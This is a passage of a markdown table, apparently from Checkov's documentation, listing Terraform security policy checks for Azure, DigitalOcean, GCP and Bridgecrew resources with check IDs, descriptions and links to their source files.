Namespace is zone redundant | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py) | +| 1506 | CKV_AZURE_230 | resource | azurerm_redis_cache | Standard Replication should be enabled | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py) | +| 1507 | CKV_AZURE_231 | resource | azurerm_app_service_environment_v3 | Ensure App Service Environment is zone redundant | Terraform | [AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py) | +| 1508 | CKV_AZURE_232 | resource | azurerm_kubernetes_cluster | Ensure that only critical system pods run on system nodes | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py) | +| 1509 | CKV_AZURE_233 | resource | azurerm_container_registry | Ensure Azure Container Registry (ACR) is zone redundant | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py) | +| 1510 | CKV_AZURE_234 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender for cloud is set to On for Resource Manager | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py) | +| 1511 | CKV_AZURE_235 | resource | azurerm_container_group | Ensure that Azure container environment variables are configured with secure values only | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py) | +| 1512 | CKV_AZURE_236 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts enable local authentication | Terraform | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py) | +| 1513 | CKV_AZURE_237 | resource | azurerm_container_registry | Ensure dedicated data endpoints are enabled. | Terraform | [ACRDedicatedDataEndpointEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py) | +| 1514 | CKV_AZURE_238 | resource | azurerm_cognitive_account | Ensure that Cognitive Services account is not configured with managed identity | Terraform | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py) | +| 1515 | CKV2_AZURE_1 | resource | azurerm_storage_account | Ensure storage for critical data are encrypted with Customer Managed Key | Terraform | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml) | +| 1516 | CKV2_AZURE_2 | resource | azurerm_mssql_server_security_alert_policy | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | +| 1517 | CKV2_AZURE_2 | resource | azurerm_sql_server | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | +| 1518 | CKV2_AZURE_3 | resource | azurerm_mssql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 1519 | CKV2_AZURE_3 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 1520 | CKV2_AZURE_3 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 1521 | CKV2_AZURE_3 | resource | azurerm_sql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 1522 | CKV2_AZURE_4 | resource | azurerm_mssql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 1523 | CKV2_AZURE_4 | resource | azurerm_mssql_server_security_alert_policy | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 1524 | CKV2_AZURE_4 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 1525 | CKV2_AZURE_4 | resource | azurerm_sql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 1526 | CKV2_AZURE_5 | resource | azurerm_mssql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 1527 | CKV2_AZURE_5 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 1528 | CKV2_AZURE_5 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 1529 | CKV2_AZURE_5 | resource | azurerm_sql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 1530 | CKV2_AZURE_6 | resource | azurerm_sql_firewall_rule | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | +| 1531 | CKV2_AZURE_6 | resource | azurerm_sql_server | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | +| 1532 | CKV2_AZURE_7 | resource | azurerm_sql_server | Ensure that Azure Active Directory Admin is configured | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml) | +| 1533 | CKV2_AZURE_8 | resource | azurerm_monitor_activity_log_alert | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 1534 | CKV2_AZURE_8 | resource | azurerm_storage_account | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 1535 | CKV2_AZURE_8 | resource | azurerm_storage_container | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 1536 | CKV2_AZURE_9 | resource | azurerm_virtual_machine | Ensure Virtual Machines are utilizing Managed Disks | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml) | +| 1537 | CKV2_AZURE_10 | resource | azurerm_virtual_machine | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | +| 1538 | CKV2_AZURE_10 | resource | azurerm_virtual_machine_extension | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | +| 1539 | CKV2_AZURE_11 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml) | +| 1540 | CKV2_AZURE_12 | resource | azurerm_virtual_machine | Ensure that virtual machines are backed up using Azure Backup | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml) | +| 1541 | CKV2_AZURE_13 | resource | azurerm_mssql_server_security_alert_policy | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | +| 1542 | CKV2_AZURE_13 | resource | azurerm_sql_server | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | +| 1543 | CKV2_AZURE_14 | resource | azurerm_managed_disk | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | +| 1544 | CKV2_AZURE_14 | resource | azurerm_virtual_machine | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | +| 1545 | CKV2_AZURE_15 | resource | azurerm_data_factory | Ensure that Azure data factories are encrypted with a customer-managed key | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml) | +| 1546 | CKV2_AZURE_16 | resource | azurerm_mysql_server | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | +| 1547 | CKV2_AZURE_16 | resource | azurerm_mysql_server_key | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | +| 1548 | CKV2_AZURE_17 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | +| 1549 | CKV2_AZURE_17 | resource | azurerm_postgresql_server_key | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | +| 1550 | CKV2_AZURE_19 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Terraform | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml) | +| 1551 | CKV2_AZURE_20 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 1552 | CKV2_AZURE_20 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 1553 | CKV2_AZURE_20 | resource | azurerm_storage_table | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 1554 | CKV2_AZURE_21 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 1555 | CKV2_AZURE_21 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 1556 | CKV2_AZURE_21 | resource | azurerm_storage_container | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 1557 | CKV2_AZURE_22 | resource | azurerm_cognitive_account | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | +| 1558 | CKV2_AZURE_22 | resource | azurerm_cognitive_account_customer_managed_key | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | +| 1559 | CKV2_AZURE_23 | resource | azurerm_spring_cloud_service | Ensure Azure spring cloud is configured with Virtual network (Vnet) | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml) | +| 1560 | CKV2_AZURE_24 | resource | azurerm_automation_account | Ensure Azure automation account does NOT have overly permissive network access | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml) | +| 1561 | CKV2_AZURE_25 | resource | azurerm_mssql_database | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml) | +| 1562 | CKV2_AZURE_26 | resource | azurerm_postgresql_flexible_server_firewall_rule | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml) | +| 1563 | CKV2_AZURE_27 | resource | azurerm_mssql_server | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml) | +| 1564 | CKV2_AZURE_28 | resource | azurerm_container_group | Ensure Container Instance is configured with managed identity | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml) | +| 1565 | CKV2_AZURE_29 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Azure CNI networking enabled | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml) | +| 1566 | CKV2_AZURE_30 | resource | azurerm_container_registry_webhook | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml) | +| 1567 | CKV2_AZURE_31 | resource | azurerm_subnet | Ensure VNET subnet is configured with a Network Security Group (NSG) | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml) | +| 1568 | CKV2_AZURE_32 | resource | azurerm_key_vault | Ensure private endpoint is configured to key vault | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml) | +| 1569 | CKV2_AZURE_33 | resource | azurerm_storage_account | Ensure storage account is configured with private endpoint | Terraform | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml) | +| 1570 | CKV2_AZURE_34 | resource | azurerm_sql_firewall_rule | Ensure Azure SQL server firewall is not overly permissive | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml) | +| 1571 | CKV2_AZURE_35 | resource | azurerm_recovery_services_vault | Ensure Azure recovery services vault is configured with managed identity | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml) | +| 1572 | CKV2_AZURE_36 | resource | azurerm_automation_account | Ensure Azure automation account is configured with managed identity | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml) | +| 1573 | CKV2_AZURE_37 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is using latest TLS (1.2) | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml) | +| 1574 | CKV2_AZURE_38 | resource | azurerm_storage_account | Ensure soft-delete is enabled on Azure storage account | Terraform | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml) | +| 1575 | CKV2_AZURE_39 | resource | azurerm_linux_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 1576 | CKV2_AZURE_39 | resource | azurerm_network_interface | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 1577 | CKV2_AZURE_39 | resource | azurerm_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 1578 | CKV2_AZURE_39 | resource | azurerm_windows_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 1579 | CKV2_AZURE_40 | resource | azurerm_storage_account | Ensure storage account is not configured with Shared Key authorization | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml) | +| 1580 | CKV2_AZURE_41 | resource | azurerm_storage_account | Ensure storage account is configured with SAS expiration policy | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml) | +| 1581 | CKV2_AZURE_42 | resource | azurerm_postgresql_server | Ensure Azure PostgreSQL server is configured with private endpoint | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml) | +| 1582 | CKV2_AZURE_43 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is configured with private endpoint | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml) | +| 1583 | CKV2_AZURE_44 | resource | azurerm_mysql_server | Ensure Azure MySQL server is configured with private endpoint | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml) | +| 1584 | CKV2_AZURE_45 | resource | azurerm_mssql_server | Ensure Microsoft SQL server is configured with private endpoint | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml) | +| 1585 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_security_alert_policy | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | +| 1586 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_vulnerability_assessment | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | +| 1587 | CKV2_AZURE_47 | resource | azurerm_storage_account | Ensure storage account is configured without blob anonymous access | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml) | +| 1588 | CKV2_AZURE_48 | resource | azurerm_databricks_workspace | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | Terraform | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml) | +| 1589 | CKV2_AZURE_49 | resource | azurerm_machine_learning_workspace | Ensure that Azure Machine learning workspace is not configured with overly permissive network access | Terraform | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml) | +| 1590 | CKV2_AZURE_50 | resource | azurerm_machine_learning_workspace | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml) | +| 1591 | CKV2_AZURE_50 | resource | azurerm_storage_account | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml) | +| 1592 | CKV_BCW_1 | provider | bridgecrew | Ensure no hard coded API token exist in the provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py) | +| 1593 | CKV_DIO_1 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket has versioning enabled | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py) | +| 1594 | CKV_DIO_2 | resource | digitalocean_droplet | Ensure the droplet specifies an SSH key | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py) | +| 1595 | CKV_DIO_3 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket is private | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py) | +| 1596 | CKV_DIO_4 | resource | digitalocean_firewall | Ensure the firewall ingress is not wide open | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py) | +| 1597 | CKV_GCP_1 | resource | google_container_cluster | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py) | +| 1598 | CKV_GCP_2 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted ssh access | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py) | +| 1599 | CKV_GCP_3 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted rdp access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py) | +| 1600 | CKV_GCP_4 | resource | google_compute_ssl_policy | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py) | +| 